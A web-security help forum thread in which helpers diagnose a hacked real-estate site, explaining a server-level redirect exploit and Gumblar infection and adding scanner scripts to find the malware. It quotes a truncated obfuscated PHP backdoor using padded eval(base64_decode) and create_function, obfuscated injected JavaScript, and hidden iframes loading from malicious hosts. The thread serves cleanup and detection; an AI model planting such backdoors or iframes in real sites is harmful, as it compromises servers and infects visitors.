Please check my site! This is really annoying for us!!!
by rosesfutur
7 months ago

Please, I cannot find anything about what Google is saying about our web site; we really do need help from someone. I really think this reporting system isn’t working at all…

Site is www.rosesfutur.com, thank you guys!!

<hr />

Of the 9 pages we tested on the site over the past 90 days, 5 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-12-13, and the last time suspicious content was found on this site was on 2009-12-12.

Malicious software includes 10 scripting exploit(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

Malicious software is hosted on 5 domain(s), including 51th.net/, active24.cz/, innotech.ru/.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including innotech.ru/.

This site was hosted on 1 network(s) including AS16338 (AUNA).

<hr />
by redleg
7 months ago

The file

http://www.rosesfutur.com/es/venta.html

is hacked.

by rosesfutur
7 months ago

This is the actual code for the file venta.html. If someone sees something special, please let me know…

CODE:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta>
<title>ROSES FUTUR S.A.</title>
<meta>
<meta>
<meta>
<meta>
<style type="text/css">
<!-- TD P { color: #000000 } P { color: #000000 } -->

</style> </head> <body> <table> <tbody> <tr> <td>

<map>
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fcontacte.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Flloguer.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fprojectes.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fventa.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fempresa.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2F" rel="nofollow">
</map>
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fmenues.jpg" height="72" width="900">

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fpromocions.jpg" height="303" width="900">

</td> </tr> <tr> <td> <img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fbarra.jpg"> </td> </tr> <tr> <td>

Edificio Roger

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedroger.jpg" height="170" width="900">

</td> </tr> <tr> <td>

Edificio Gravina

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedgravina.jpg" height="170" width="900">

</td> </tr> <tr> <td>

Edificio Guifré

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedmarcisofia.jpg" height="170" width="900">

</td> </tr> <tr> <td>

Carrer Mairó

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedmairo.jpg" height="170" width="900">

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fbaix.jpg" height="55" width="900">

</td> </tr> </tbody> </table>



</body> </html>
by rosesfutur
7 months ago

I don’t know why, but when I copy and paste the code it doesn’t appear as is, so please, can anyone check the code? I see nothing special really…

http://www.rosesfutur.com/es/venta.html

by Kaleh
7 months ago

There’s a lot more going on here than just the file that redleg identified for you. I don’t have time to dig into it any further, but hopefully with a record of the things I ran into, someone else (possibly redleg) will be along to provide some additional feedback.

You might want to see what information you get through the Dashboard for your site in Google Webmaster Tools. The data that was returned through UnmaskParasites is not currently visible to me when I check that same page with RexSwain’s Http Viewer or Web-sniffer.net.

Check [Labs | Malware Details] as well as [Fetch as Googlebot] and let us know what you find.

http://www.google.com/safebrowsing/diagnostic?site=http://www.rosesfutur.com/&hl=en

http://wam.dasient.com/wam/diagnose?scan_id=164852

http://www.UnmaskParasites.com/security-report/?page=www.rosesfutur.com

Title:
URL: http://www .rosesfutur .com
Google: listed as suspicious?* how to resolve?
Last checked: 7 minutes ago (results are cached for 1 hour)
This report:
External References
- keygenguru .com safe? – displaying 5 of 44

  • serial number – http ://keygenguru .com
  • online movies – http ://keygenguru .com /movies .php
  • Buy Cakewalk Sonar 7.0 Producer Edition – http ://keygenguru .com /software /cakewalk-sonar-7-producer-edition .html
  • Buy Borland Developer Studio 2006 – http ://keygenguru .com /software/borland-developer-studio-2006 .html
  • Download Autodesk AutoCAD Revit Architecture Suite 2009 – http ://keygenguru .com /software /autodesk-autocad-revit-atchitecture-suite-2009 .html

- www .getcoolmovies .com safe? – displaying 1 of 1

  • Buy Avatar movie – http ://www.getcoolmovies .com/movies /countries /usa /avatar/

- supersoftwarestore .com safe? – displaying 1 of 1

  • cheap oem software – http ://supersoftwarestore .com

- buzz .yahoo .com safe? – displaying 5 of 30

  • Download Cirque du Freak: The Vampire’s Assistant – http ://buzz .yahoo .com /article /1:00be684a7bc2f9b14776630bc05dbd3a:b4637b2a21625f2854e317eeccca2d30/Download-Cirque-du-Freak-The-Vampires-Assistant-movie
  • Download Couples Retreat – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:2d711a2b0741cb8f096f4ef60093c2f5/Download-Couples-Retreat-movie
  • Watch Bye-Bye Bin Laden – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:9c331571a43c74f73d1f618f85fb28e7/Download-Bye-Bye-Bin-Laden-movie
  • Download The Maiden Heist – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:f35ffdf9fc3036c1dc10670675f7f61f/Download-The-Maiden-Heist-movie
  • Download Four Christmases – http ://buzz .yahoo .com/article/1:00be684a7bc2f9b14776630bc05dbd3a:4249540223e743b58455abbf709e9627/Download-Four-Christmases-movie

Suspicious Inline Scripts
Script outside of <html>…</html> block

var rpjqs=new Date( ); rpjqs.setTime(rpjqs.getTime( )+12*60*60*1000); document.cookie="n\x5fses\x73…

Script outside of <html>…</html> block

document.write(String.fromCharCode(59+1,100,105,118,32,115,116,121,108,101,61,39,100,105,115,112,10….

by denis
7 months ago

Hi,

Unmask Parasites reports typical signs of a server-level exploit. It works intermittently and is hard to detect (e.g. I don’t see it right now even using Unmask Parasites).

Here is the article that explains how this exploit works.
http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/

Show this article to your hosting provider, because you can’t solve the problem yourself. Every site on your server is affected. And the backdoor script that triggers the malicious Apache process may be hidden somewhere in another site.

Moreover, it looks like your site had been infected with Gumblar (this time it is something that affected your site only). This means that your FTP credentials had been stolen.
You can find more details about Gumblar and complete removal instructions here:
http://blog.unmaskparasites.com/2009/10/23/revenge-of-gumblar-zombies/

Denis – www.UnmaskParasites.com

by denis
7 months ago

To server admins:

Lately, hackers have started to encrypt eval(base64_decode calls, so you may have problems locating backdoor scripts. Here is a sample of such an encrypted backdoor script.

$PyIqJDl='#####e##############################v###a####l(b########a####s###e###########6##4##########_##d###eco###d####e#######(#\'ZXJyb3JfcmVwb3J0aW5WMEbGJtZGZ*removed a lot of code here*V2ZEdoCgkYyk7Cn0=\'));';
$PyIqJDl=str_replace('#', '', $PyIqJDl);$OOxbqtu=create_function('',$PyIqJDl);$OOxbqtu(); ?>
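The padding trick in Denis's sample defeats a literal search for `eval(base64_decode`, but the file itself tells you how to undo it: the `str_replace('#', '', ...)` call names the filler character. A scanner can therefore strip whatever character the script removes at runtime and search the normalised text. The following is an added example written for this thread, not Denis's or UnmaskParasites' code; the PHP sample inside it is constructed with a harmless stand-in payload, not the backdoor quoted above.

```python
import base64
import re
from typing import Dict, List

# Constructed sample (not the backdoor from the post above): an
# eval(base64_decode('...')) call padded with '#' so a plain grep finds nothing,
# rebuilt with str_replace and executed through create_function. The base64
# payload is a harmless constructed stand-in.
PAYLOAD = base64.b64encode(b"error_reporting(0); /* constructed stand-in payload */").decode()
PADDED = "#####e##############v###a####l(b####a####s###e###6##4###_##d###eco###d###e####(#\\'" + PAYLOAD + "\\'));"
SAMPLE_PHP = (
    "<?php\n"
    f"$PyIqJDl='{PADDED}';\n"
    "$PyIqJDl=str_replace('#', '', $PyIqJDl);$OOxbqtu=create_function('',$PyIqJDl);$OOxbqtu(); ?>\n"
)

# The construct we want to see once the filler is gone; the group captures the base64 text.
EVAL_B64_RE = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\\?['\"]([A-Za-z0-9+/=]+)", re.IGNORECASE)
# Whatever single character the file deletes with str_replace(c, '', ...) is the filler.
FILLER_RE = re.compile(r"str_replace\(\s*['\"](.)['\"]\s*,\s*['\"]['\"]")
CREATE_FUNCTION_RE = re.compile(r"create_function\s*\(", re.IGNORECASE)


def filler_characters(source: str) -> List[str]:
    """Characters the script itself strips out at runtime."""
    return sorted(set(FILLER_RE.findall(source)))


def normalise(source: str) -> str:
    """Undo the padding by removing every filler character the file removes itself."""
    for ch in filler_characters(source):
        source = source.replace(ch, "")
    return source


def scan_php(source: str) -> Dict[str, object]:
    """Report eval(base64_decode(...)) hits before and after normalisation, with a payload preview."""
    plain = normalise(source)
    hits = EVAL_B64_RE.findall(plain)
    previews = []
    for b64 in hits:
        try:
            padded = b64 + "=" * (-len(b64) % 4)
            previews.append(base64.b64decode(padded).decode("utf-8", "replace")[:80])
        except Exception:  # not valid base64: still worth reporting the hit
            previews.append("<undecodable>")
    uses_cf = bool(CREATE_FUNCTION_RE.search(source))
    return {
        "raw_grep_hits": len(EVAL_B64_RE.findall(source)),
        "normalised_hits": len(hits),
        "filler": filler_characters(source),
        "uses_create_function": uses_cf,
        "payload_previews": previews,
        "suspicious": bool(hits) or uses_cf,
    }


if __name__ == "__main__":
    for key, value in scan_php(SAMPLE_PHP).items():
        print(f"{key}: {value}")
```

The point of reporting `raw_grep_hits` next to `normalised_hits` is to show why the padded sample slips past a plain search (0 hits) yet is found once the filler is removed (1 hit); `create_function` with a string body is flagged on its own because it is how the rebuilt code gets executed.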

by rosesfutur
7 months ago

This is the actual code for the file venta.html. If someone sees something special, please let me know…

CODE:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta>
<title>ROSES FUTUR S.A.</title>
<meta>
<meta>
<meta>
<meta>
<style type="text/css">
<!-- TD P { color: #000000 } P { color: #000000 } -->

</style> </head> <body> <table> <tbody> <tr> <td>

<map>
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fcontacte.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Flloguer.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fprojectes.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fventa.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2Fes%2Fempresa.html" rel="nofollow">
<area href="http://badwarebusters.org/interstitial?uri=http%3A%2F%2Fwww.rosesfutur.com%2F" rel="nofollow">
</map>
<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fmenues.jpg" height="72" width="900">

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fpromocions.jpg" height="303" width="900">

</td> </tr> <tr> <td> <img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fbarra.jpg"> </td> </tr> <tr> <td>

Edificio Roger

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedroger.jpg" height="170" width="900">

</td> </tr> <tr> <td>

Edificio Gravina

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedgravina.jpg" height="170" width="900">

</td> </tr> <tr> <td>

Edificio Guifré

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedmarcisofia.jpg" height="170" width="900">

</td> </tr> <tr> <td>

Carrer Mairó

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=images%2Fedmairo.jpg" height="170" width="900">

</td> </tr> <tr> <td>

<img rel="nofollow" src="http://badwarebusters.org/interstitial?uri=..%2Fimages%2Fbaix.jpg" height="55" width="900">

</td> </tr> </tbody> </table>



</body>

</html>

by redleg
7 months ago

There is nothing suspicious. Your site is randomly serving a hacked page instead of the page that is requested.

by rosesfutur
7 months ago

Sorry, I don’t understand that… If there’s no problem in my page, what’s the problem??

by WeWatch
7 months ago

The server your website is on is intercepting HTTP requests and returning infectious code, which is why Denis said to get your hosting provider involved.

This also means that many other websites on the same web server as your site are also being affected.

Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com

by Kaleh
7 months ago

As Denis mentioned earlier, the problem is intermittent and difficult to catch. I got lucky when the original UnmaskParasites scan revealed the problem.

When visitors request pages of various sites on the server, they are intermittently served malicious content instead of the actual page that they requested. The problem will not surface every single time a particular page is requested, which makes it difficult to detect.

This is why Denis has referred you to the GoScanPark article and suggested that you show this to your hosting provider. Provide them with a link to this thread, in addition to the articles referenced.

by scripy
7 months ago

Hi

Your website’s pages are still infected by malicious code, so follow the given steps.

*First, scan your own computer and make sure that there aren’t any kind of Trojans/malware/viruses on it; clean up all stored passwords and don’t store passwords on your computer in future. Do this before going on to the given steps.

*Second, change FTP passwords and use complex passwords.

*Third, download the whole source code, find the given malicious/suspicious code manually, and delete it from all web pages…

<iframe frameborder=0 border=0 height=5 width=0 src="http://eleanornursing.co.uk/admin/getfile.php?a=1"> <iframe frameborder=0 border=0 height=5 width=0 src="http://elspyra.pl/adv/getfile.php?a=1"…

*Fourth, then use Google Webmaster Tools (http://www.google.com/webmasters) to submit a “Request for Review”, which will remove that RED flag from your website.

Thanks
scripy
tech717@hotmail.com
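The third step above (download the whole source and find the injected iframes by hand) is easier with a sweep over the downloaded tree that flags every iframe sized so a visitor cannot see it (`width=0`, `height=5`), the shape of the snippet quoted in the post. The following is an added example written for this thread, not code from scripy or from any of the tools mentioned; the site tree it scans is constructed in a temporary directory and the hostname in it is a placeholder, not one from the post.

```python
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Constructed sample site tree (not the real site's files): one clean page and
# two pages carrying an injected zero-width iframe of the quoted shape. The
# hostname is a placeholder.
SAMPLE_FILES = {
    "index.html": "<html><body><p>Welcome</p></body></html>\n",
    "es/venta.html": (
        "<html><body><p>Venta</p>\n"
        "<iframe frameborder=0 border=0 height=5 width=0 "
        'src="http://malicious-host.example/admin/getfile.php?a=1"></iframe>\n'
        "</body></html>\n"
    ),
    "es/contacte.html": (
        "<html><body><iframe frameborder=0 border=0 height=5 width=0 "
        "src='http://malicious-host.example/adv/getfile.php?a=1'></iframe></body></html>\n"
    ),
    "images/readme.txt": "not html\n",
}

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# name=value with double quotes, single quotes, or no quotes at all (as in the quoted snippet).
ATTR_RE = re.compile(r"(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def iframe_attrs(tag: str) -> Dict[str, str]:
    """Parse the attributes of one <iframe ...> start tag into a lower-cased dict."""
    return {k.lower(): (a or b or c) for k, a, b, c in ATTR_RE.findall(tag)}


def is_hidden_iframe(tag: str) -> bool:
    """True when the iframe loads a src but is sized so the visitor cannot see it."""
    attrs = iframe_attrs(tag)

    def px(name: str):
        try:
            return int(re.sub(r"px$", "", attrs.get(name, "")))
        except ValueError:
            return None  # missing or non-numeric (e.g. '100%') dimension

    width, height = px("width"), px("height")
    tiny = any(v is not None and v <= 10 for v in (width, height))
    return tiny and "src" in attrs


def sweep(root: str, exts=(".html", ".htm", ".php")) -> List[Tuple[str, int, str]]:
    """Walk a downloaded source tree; return (relative path, line number, src) per hidden iframe."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for m in IFRAME_RE.finditer(line):
                        if is_hidden_iframe(m.group(0)):
                            findings.append((rel, lineno, iframe_attrs(m.group(0)).get("src", "")))
    return sorted(findings)


def build_sample_tree() -> str:
    """Write the constructed files into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="site-")
    for rel, content in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, lineno, src in sweep(build_sample_tree()):
        print(f"{rel}:{lineno}: hidden iframe loading {src}")
```

Run it against the directory you downloaded over FTP; it only reports, so you still decide what to delete, and the report gives you file and line for each hit rather than a bare grep match that would also fire on legitimate, visibly sized iframes.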
